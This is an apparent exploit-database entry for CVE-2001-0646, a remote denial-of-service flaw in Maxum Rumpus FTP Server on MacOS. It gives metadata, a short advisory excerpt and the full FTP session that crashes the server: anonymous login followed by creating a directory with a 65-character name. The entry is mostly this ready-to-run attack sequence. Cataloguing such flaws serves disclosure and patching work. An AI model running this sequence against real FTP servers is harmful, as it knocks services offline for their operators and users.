Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote Denial of Service

Author: Jass Seljamaa
type: dos
platform: osx
port: 
date_added: 2001-05-15  
date_updated: 2012-08-26  
verified: 1  
codes: CVE-2001-0646;OSVDB-1823  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20845.txt  

source: https://www.securityfocus.com/bid/2716/info

Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections.

It is possible to log in remotely to the server and shut down the service by making a directory with a name that is 65 characters long. Users must be authenticated to engage this attack.

ftp host

user anonymous
pass anonymous

mkdir
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa